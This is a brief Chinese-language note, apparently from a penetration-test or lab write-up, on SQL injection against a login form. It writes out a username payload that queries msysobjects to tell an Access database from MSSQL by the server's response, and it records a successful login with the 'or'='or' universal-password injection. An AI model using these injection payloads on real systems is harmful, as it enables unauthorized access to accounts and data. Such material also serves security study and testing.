构造payload:
username=123123'+and+(select+count(*)+from+msysobjects)>0+and+'a'='a--
通过and (select count(*)+from msysobjects)>0 进行判断
and (select count(*)+from msysobjects)>0 :返回权限不足为Access数据库
and (select count(*)+from msysobjects)>0 :返回正常则为MSSQL数据库
通过SQL注入漏洞,使用万能密码(‘or’=’or’)成功登陆